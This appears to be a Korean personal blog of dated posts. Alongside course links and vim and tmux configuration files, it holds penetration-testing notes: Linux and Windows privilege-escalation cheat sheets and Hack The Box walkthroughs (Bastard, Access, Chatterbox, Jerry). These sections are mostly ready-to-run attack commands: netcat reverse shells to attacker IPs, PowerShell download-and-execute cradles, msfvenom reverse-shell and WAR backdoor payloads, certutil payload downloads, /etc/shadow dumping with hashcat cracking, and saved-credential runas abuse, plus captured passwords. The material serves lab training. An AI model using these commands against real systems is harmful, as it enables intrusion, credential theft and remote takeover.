Elbrown

[프로젝트] 인프라진단 Copy&Paste 스크립트

우와해커 — Tue, 2 Feb 2021 11:41:03 +0900

https://github.com/bbakbbak2/InfraProject

bbakbbak2/InfraProject

노가다 시간 줄이기 위한 자동화 스크립트 ㅠ.ㅠ. Contribute to bbakbbak2/InfraProject development by creating an account on GitHub.

github.com

강의 사이트

우와해커 — Wed, 14 Oct 2020 17:46:20 +0900

expressJS - semantic UI

https://www.npmjs.com/package/express-semantic-ui

semantic UI 생활코딩 강좌

https://www.youtube.com/watch?v=Gsn1heIn2V8&list=PLuHgQVnccGMDUIlVEAZPjYq4Y2idO-O07&index=2

pm2

코드랩 expressJS

https://jeonghwan-kim.github.io/series/2018/12/01/node-web-1_orientation.html

생활코딩 expressJS(완강)

https://opentutorials.org/course/3370/21378

생활코딩 NodeJS-MySQL(완강)

https://opentutorials.org/course/3347

GIT

https://www.zerocho.com/category/Git/post/580f633046f4fe09815b72a5

vim javascript 코딩설정

우와해커 — Sat, 10 Oct 2020 15:33:43 +0900

https://maxim-danilov.github.io/vim-to-js-ide/

" https://github.com/pangloss/vim-javascript

set nocompatible " be iMproved, required

filetype off " required

" set the runtime path to include Vundle and initialize

set rtp+=~/.vim/bundle/Vundle.vim

call vundle#begin()

" alternatively, pass a path where Vundle should install plugins

"call vundle#begin('~/some/path/here')

Plugin 'VundleVim/Vundle.vim'

Plugin 'tpope/vim-fugitive'

Plugin 'git://git.wincent.com/command-t.git'

Plugin 'rstacruz/sparkup', {'rtp': 'vim/'}

Plugin 'pangloss/vim-javascript'

"Lint

Plugin 'w0rp/ale'

"Auto Complate

"Plugin 'Valloric/YouCompleteMe'

" Add color scheme Ych

Plugin 'larsbs/vimterial_dark'

" Filre Explorer

Plugin 'scrooloose/nerdtree'

" System Clipboard

Plugin 'christoomey/vim-system-copy'

call vundle#end() " required

filetype plugin indent on " required

" NERDTress Ctrl+n

map <C-n> :NERDTreeToggle<CR>

" NERDTress File highlighting

"install theme https://github.com/larsbs/vimterial_dark

syntax on

let &t_8f = "\<Esc>[38;2;%lu;%lu;%lum"

let &t_8b = "\<Esc>[48;2;%lu;%lu;%lum"

set termguicolors

colorscheme vimterial_dark

set ts=2

set nu

Linux privsec 테크닉

우와해커 — Tue, 29 Sep 2020 14:18:42 +0900

리눅스 manual 테크닉

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

Kernel exploits

-다른 쳅터 참고

Programs running as root

>ps aux

Mysql root로 실행중이고 디비 접속 가능하다면 쉘 실행가능

select sys_exec('whoami');

select sys_eval('whoami');

+User Defined function

Installed software

- 설치되는 폴더가 넘 광범위함, 스크립트를 활용하거나 dpkg만....

# Debian

dpkg -l

Weak/reused/plaintext passwords

- DB가 저장된 웹소스, 설정파일 찾아보기

- DB에 저장된 계정의 비밀번호가 서버의 계정 비번으로 재사용되는지 체크

- /var/spool/mail(메일박스 뒤져보기)

Inside service (내부망만 접근 가능한 서비스)

해당 호스트에서만 사용할 수 있는 일부 서비스를 실행 중일 수 있습니다. 외부에서 서비스에 연결할 수 없습니다.

개발 서버, 데이터베이스 또는 다른 것이 될 수 있습니다. 이러한 서비스는 루트로 실행 중이거나 취약점이 있을 수 있습니다.

- netstat를 확인하고 외부에서 수행 한 nmap-scan과 비교하십시오. 내부에서 더 많은 서비스를 찾을 수 있습니까?

# Linux

netstat -anlp

netstat -ano

Suid misconfiguration

소유자 root, setuid 설정, 쉘전환 기능 있는 프로그램 또는 명령어도 공격될 수 있음

nmap, vim, less, more, nano, cp, mv, find

Abusing sudo-rights

>sudo -l 사용하여 exploit

World writable scripts invoked by root

- root에 의해 실행되는 스크립트, 일반유저가 편집이 가능한지

- 리버스쉘 스크립트로 편집하여 Exploit

Bad path configuration

- 바이너리의 path경로에 .이 존재

- Strings로 바이너리 문자열 체크

- PATH 변수 편집하여 tmp폴더에서 페이로드 실행되도록 만들기

- export PATH=.;$PATH

Cronjobs

- 아래 외에 봐야할 폴더가 더 있음, 스크립트로 체크하자.

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

Unmounted filesystems

- 언마운트된 시스템을 찾은 후 다시 마운트하여 권한상승 될만한것을 찾아 볼 수 있음

> mount -l

> cat /etc/fstab

NFS Share

- NFS에 root_sqush같은 설정이 존재하면 원격 root 이름으로 파일 생성이 가능함

# First check if the target machine has any NFS shares

showmount -e 192.168.1.101

# If it does, then mount it to you filesystem

mount 192.168.1.101:/ /tmp/

World writable directorie

- 파일업로드 위치로 사용하면 됨

/tmp

/var/tmp

/dev/shm

/var/spool/vbox

/var/spool/samba

Privilege Escalation - Weak File Permissions

- 파일을 읽을 수 있고 Hash가 존재하는 경우

>cat /etc/passwd (마우스로 copy&pate로 로컬에 복사)

>cat /etc/shadow (마우스로 copy&pate로 로컬에 복사)

# unbshadow로 병합 후 브루트포싱

> unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt

> hashcat -m 1800 unshadowed.txt rockyou.txt -O

Remote port forwarding

원격 포트 포워딩은 미쳤지만 매우 간단한 개념입니다.

당신은 컴퓨터에 접근했고 컴퓨터가 MYSQL처럼 실행 중이지만 localhost에서만 액세스 할 수 있다고 가정 해보십시오.

당신은 엉터리 shell을 가지고 있기 때문에 그것에 접근 할 수 없습니다.

그래서 우리가 할 수있는 것은 그 포트를 공격하는 컴퓨터로 전달하는 것입니다.

파이썬이 설치되어있는 경우 (sshuttle을 사용해 리모트 포트포워딩을 손쉽게 셋팅할 수 있음)

sshuttle -r root@192.168.1.101 192.168.1.0/24

plink 사용

plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080

Windows privsec 테크닉

우와해커 — Mon, 28 Sep 2020 16:31:18 +0900

https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842

*주목해야할 권한 주체

Authenticated User

NT AUTHORITY\INTERACTIVE

BUILTIN\Users(로그인 사용자)

Everyone

스크립트마다 누락된 사항이 있을 수 있기 때문에 여러개를 돌려봐야함, 수동으로 찾아보는 것도 추천된다.

Sherlock (Deprecated) => Watsons 사용할 것

https://github.com/rasta-mouse/Watson

커맨드창에서 파워 쉘 실행 옵션

powershell -noprofile -nologo -ep bypass -file WindowsEnum.ps1

* RDP허용? O, 저장된 패스워드 발견? O => Test

저장된 패스워드 발견? 해당 유저로 nc 리버스 연결

PS> $secpasswd = ConvertTo-SecureString "password321" -AsPlainText -Force

$mycreds = New-Object System.Management.Automation.PSCredential ("john", $secpasswd)

$computer = "GHOST"

[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","192.168.0.114 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

PS> cmdkey /list

=> 엔트리 반환? Windows에 자신의 자격 증명을 저장한 특정 사용자로 실행할 수 있음을 의미합니다.

=> Administrator? 권한상승하여 프로그램 실행 가능

runas /savecred /user:도메인\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"

OS가 정기적으로 업데이트되면 이러한 익스플로잇은 큰 도움이되지 않습니다.

Watson을 사용하여 누락 된 패치로 인한 취약성을 확인할 수 있습니다.

Watson은 이미 winPEAS와 통합되어 있습니다.

취약점을 발견 한 경우 아래 저장소에서 동일하게 다운로드 할 수 있습니다.

대상에 맞는 아키텍처를 다운로드했는지 확인하십시오.

바이너리를 컴파일해야하는 경우 Kali를 사용하여 크로스 컴파일 할 수 있습니다.

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/abatchy17/WindowsExploits

Weak Service Permissions

* Authenticated users그룹이 서비스에 SERVICE_ALL_ACCESS를 가지고 있으면 서비스에서 실행중인 바이너리를 수정할 수 있습니다.

* 서비스 취약점 악용할때, 페이로드 포멧이 exe-service가 아니면 persistant쉘이 생성되지 않는다고 한다.

msfvenom -p windows/shell_reverse_tcp LPORT=31337 LHOST=YOURIPHERE -f exe-service > shell.exe

Weak Registry Permission

HKLM\SYSTEM\CurrentControlSet\Services\<service_name>

* Authenticated User 또는 NT AUTHORITY\INTERACTIVE가 서비스에 대해 FullControl을 가지고있는 경우 이 경우 서비스에서 실행될 바이너리를 변경할 수 있습니다.

Autorun

- 계속 의문이였던 사항인데, 권한상승을 위한 마지막 조건은 로그오프 후에 Admin그룹에 존재하는 유저로 로그인되야 한다.

Tater / Hot Potato

"Hot Potato (일명 : Potato)는 Windows의 알려진 문제를 활용하여 기본 구성, 즉 NTLM 릴레이 (특히 HTTP-> SMB 릴레이) 및 NBNS 스푸핑에서 로컬 권한 에스컬레이션을 얻습니다."

https://github.com/foxglovesec/Potato/tree/master/source/Potato/Potato/bin/Release

Token Manipulation

침투 테스트 계약에서 침투 테스터가 Apache, IIS, SQL, MySQL 등과 같은 서비스를 손상시킬 수있는 경우가 많습니다. 안타깝게도 이 서비스는 로컬 시스템이나 권한이 높은 계정으로 실행되지 않고 네트워크 서비스로 실행됩니다. 다음 익스플로잇을 사용하여 권한을 높일 수 있습니다.

1. Rotten Potato: Privilege Escalation from Service Accounts to SYSTEM

https://github.com/breenmachine/RottenPotatoNG

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

- 일반적으로 미터프리터를 이용했으나 RottenPotatoNG는 standalone exe파일을 제공한다.

2. Juicy Potato

https://github.com/ohpe/juicy-potato/releases

meterpreter> getsystem

[Windows] Batard

우와해커 — Sun, 27 Sep 2020 17:42:21 +0900

Bastard

- Drupal 취약점 코드 어떻게 실행할 것인지

- 파워 쉘 스크립트 실행 제약

=> powerless.bat, jaws-enum.ps1

Systeminfo

서비스팩 버전이 낮거나 없거나 핫픽스가 없을 경우 GOOD

Hotfix: N/A <= 커널 권한상승 가능성 높음

반대로 Hotfix 업데이트가 많은 경우 <= 커널 가능성 낮음, misconfig 설정을 찾을 것

Precompiled Binary

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/SecWiki/linux-kernel-exploits

c:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.37 7777

[Windows] Access

우와해커 — Sat, 26 Sep 2020 21:53:11 +0900

Access

- MS Access DB읽어오는 방법

- tool설치하거나 칼리에 있는거 사용하거나

- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials

root@kali:/HTB/Access# ftp

ftp> binary

ftp> get backup.mdb

ftp> get "Access Control.zip"

* wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함

wget -m ftp://anonymos:anonymous@10.10.10.98

wget -m --no-passive ftp://anonymos:anonymous@10.10.10.98

root@kali:/HTB/Access# file backup.mdb

root@kali:/HTB/Access# strings backup.mdb > backup.txt

engineer

access4u@security

root@kali:/HTB/Access# 7z x -paccess4u@security ac.zip

root@kali:/HTB/Access# file 'Access Control.pst'

Access Control.pst: Microsoft Outlook email folder (>=2003)

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.

Regards,

John

root@kali:/HTB/Access# telnet 10.10.10.98

password: 4Cc3ssC0ntr0ller

*===============================================================

Microsoft Telnet Server.

*===============================================================

C:\Users\security\Desktop>type user.txt

ff1f3b48913b213a31ff6756d2553d38

권한상승

JAWS.ps1 Enumeration

> Stored Credential 취약점

c:\Users\Public\Desktop\ZKAccess.35.lnk

or 파워쉘에서 아래 명령 실행

PS> cmdkey /list

User: Access\Administrator

Shotcut 찾기 명령어

PS> $WScript = New-Object -ComObject Wscript.Shell

PS> $shortcut = Get-ChildItem *.lnk

PS> $shortcut

PS> $WScript.CreateShortcut($shortcut)

니샹 리버스쉘로 관리자 로그인

PS> runas /user:Access\Administrator /savecred <실행할 명령>

PS> runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object

Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"

+TIP: Kali에서 파워쉘 명령 base64 인코딩해서 사용

echo -n "윈도에서 실행할 명령" | iconv --to-code UTF-16LE | base64 -w 0

Kali> echo -n "IEX (New-Object

Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

PS> runas /user:ACCESS\Administrator /savecred "powershell -EncodedCommand "<base64>"

Typically "runas /savecred" is used to create a shortcut, which the user clicks to run the desired

application. The commands below are used to enumerate all the accessible shortcut (.lnk) files on

the system, and examine them for the presence of the "runas" command

> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt

> ForEach ( $file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }

ippsec tmux 셋팅

우와해커 — Sat, 26 Sep 2020 12:53:00 +0900

ippsec tmux 셋팅

https://www.youtube.com/watch?v=Lqehvpe_djs

~/.tmux.conf

#prefix

set -g prefix C-a

bind C-a send-prefix

unbind C-b

#history, block pane rename

set -g history-limit 10000

set -g allow-rename off

bind-key j command-prompt -p "join pane from:" "join-pane -s '%%'"

bind-key s command-prompt -p "send pane to:" "join-pane -t '%%'"

# vim color

set -g default-terminal "screen-256color"

#logging

set-window-option -g mode-keys vi

run-shell ~/clone/path/logging.tmux

tmux 로깅설정 참고

https://github.com/tmux-plugins/tmux-logging

로깅 저장 (홈디렉토리에 저장됨)

prefix + alt + shift + p

C-a:Control+a, prefix단축키

C-방향키: pane 이동

C-a+z: pane Zoom In모드 / pane 풀스크린

C-a+방향키: pane 리사이즈 (C-a 홀드상태)

C-a+},{: pane 레이아웃 이동(서클방향)

C-a+?: 명령어 보기

C-a+s : pane 보내기

C-a+j : pane 가져오기

C-a+[: Edit모드

C-a+[+?: 단어 Search

C-a+[+/: 검새단어 이동

스페이스: 카피지점

엔터: 복서 마무리 완료

C-a+]: 붙여넣기

C-a+%: 수직스플릿

C-a+": 수평스플릿

C+방향키: 단어단위로 이동

[Windows] Chatterbox

우와해커 — Thu, 24 Sep 2020 17:09:40 +0900

Chatterbox

- Exploit POC 스크립트를 수정하는 법을 알아야함

- 파워쉘 명령어에 익숙해야함

Achat.exe에 대한 exploit이 존재함

=> 페이로드 poc가 cmd 실행으로 되어있어서 리버스 쉘 옵션으로 교체함

그 외 배드캐릭터 옵션과 인코딩 등 다른 옵션들은 그대로 사용

msfvenom -a x86 platform windows -p windows/shell_reverse_tcp

lhost=... lport=... -e x86/unicode_mixed -b "\x00...." BufferRegister=EAX -f python

완성된 쉘코드를 파이썬 스크립트 상에서 교체 후 타겟 IP와 포트 확인 후 변경하여 Exploit

+POC 분석에 대하여

1152 - len(Payload)

이 코드를 보고 1152는 페이로드의 맥시멈 사이즈로 예상할 수 있음

따라서, 리버스 쉘 페이로드가 이 크기보다 아래의 값으로 작성되야됨

생성된 페이로드 사이즈 줄이는 팁

1. 오리지널 리버스 파워쉘 생성: 15246바이트가 생성됨

msfvenom -a x86 platform windows -p windows/powershell_reverse_tcp

lhost=... lport=... -e x86/unicode_mixed -b "\x00...." BufferRegister=EAX -f python

2. CMD변수를 사용: 700바이트로 줄어듬(파이썬 크기가 아닌 페이로드 크기를 봐야됨)

msf venom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.10.14.30/PleaseSubscribe.ipp')\"" -b "......" BufferRegister=EAX -f python

3. Nishang 파워쉘 셋업하기

3.1. Invoke-Powershell-TCP.ps1 스크립트 복사

3.2. 마지막 부분에 옵션 추가(다운로드 후 바로 트리거되기 위함) Invoke-PowershellTcp -Reverse -IPAddress 10.10.14.30 -Port 9002

3.3. 이름 변경

mv Invoke-Powershell-TCP.ps1 PleaseSubscribe.ipp

3.4. 스크립트 트리거 후 nc 9002번 대기

=> 파워쉘 세션생성

권한상승 Recon

- Sherlock.ps1: half쉘에서 실행하면 Exploit 취약점 목록을 열거할 수 있음

- PowerUp.ps1: 스크립트를 사용하려면 먼저 Nishang 파워쉘로 fully interactive 세션으로 접근해야됨

PS> iex(New-Object Net.WebClient).downloadString('http://10.10.14.30/PowerUp.ps1')

파워쉘 상에서 iex 명령으로 인해 다운받은 스크립트가 장착됨.

바로 매소드 호출

PS> Invoke-AllChecks

플래그 얻는 두가지 방법

1. winPEAS.bat 또는 PowerUp.ps1돌리면 Alfred 하드코드 취약점 발견

=> administrator 같은 패스워드(re-use) 사용 체크

powershell사용하여 연결 또는 SMB 오픈 후 impacket의 psexec를 통해 연결하여 Administrator 접근을 시도해볼 수 있다.

1.1 powershell 사용하기

$cred 변수에 관리자 세션의 credential을 저장한다.

PS> $passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;$creds =New-Object System.Management.Automation.PSCredential('administrator' $passwd)

전에 사용했던 니샹쉘 다시 실행시켜서 해당 관리자 세션으로 러버스 쉘이 연결되도록한다.

아래 명령 사용하기전에 니샹 쉘을 편집하여 포트번호를 중복되지 않게 수정해줄것.

PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://내아이피/니샹쉘')" -Credential $creds

Kali> nc -lnvp [포트번호]

PS> whoami

2. plink 445 포트포워딩 (SMB)

certutil 사용해서 plink 다운로드

cmd> certutil -urlcache -f http://10.10.14.18/plink.exe plink.exe

내 ssh데몬 설정파일 편집

/etc/ssh/sshd_config

PermitRootLogin yes로 변경 후 서비스 실행

kali> service ssh start

plink로 칼리 연결

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.18

–l = username of our target machine (our Kali box)

-pw = password of our Kali box

-R = port forward

On Port 445 on our Windows box, I want to redirect that to port 445 on my Kali box.

Click “Yes” when prompted about storing the key. Then hit Enter a few times until you see the root@kali login:

You can verify your port forward by typing netstat -ano | grep 445

WinExe(psexec) (이 프로그램을 사용하려면 445포트가 오픈되어 있어야함)

This tool is a Linux based tool which then runs commands on a Windows system.

To get going, we’ll try this command: winexe -U Administrator%Welcome1! //127.0.0.1 “cmd.exe”

2. Alfred가 root.txt에 대한 권한을 가지고 있어서 ACL변경을 통해

읽을 수 있음

admin폴더 접근 가능, root플래그 읽기 불가

파일 읽기

PS> gc root.txt

권한확인

PS> icalcs root.txt

Administrator:(F) <- 관리자만 full access접근 허용

PS> icalcs ..\Desktop

Alfred:(F) <- Aflred는 Desktop에 full access접근 권한이 있다.

상위 폴더에 풀접근이 있어서 파일에 권한 부여시도함

PS> icacls root.txt /grant alfred:f

PS> (gc root.txt).substring(0,16)

gc는 Get-Content의 약어

CMD에서 상위디렉토리 권한 확인할 경우(cacls)

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop

cacls C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F

CHATTERBOX\Administrator:(OI)(CI)(ID)F

BUILTIN\Administrators:(OI)(CI)(ID)F

CHATTERBOX\Alfred:(OI)(CI)(ID)F

[Windows] Jerry

우와해커 — Thu, 24 Sep 2020 15:11:46 +0900

Jerry

배운점

- 디폴트페이지 접근

- msfvenom .war 타입 쉘 지원

1. tomcat 메니저 페이지 접근 후 디폴트 credential 입력

/manager/html

2. msfvenom으로 jsp/war 타입 리버스쉘 페이로드 생성하여 업로드

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war

잘못된 점

- msfvenom에서 war타입 리버스 쉘을 제공하는지 모르고 빙빙돌아감

1. 칼리에 존재하는 jsp 웹쉘 war파일을 올린 후 msfvenom으로 tcp리버스 쉘 생성하여 업로드

2. jsp웹쉘에 접근, 파워쉘로 venom 페이로드 다운로드 받았지만 exe파일 실행이 안되서 망함.

3. 내가 사용한 단순 cmd jsp웹쉘은 디렉토리 목록도 안보이고 기능이 뭔가 어설픔.

커맨드에 powershell dir 을 통해 보안할 수 있었지만 exe파일 실행은 죽어도 안되더라.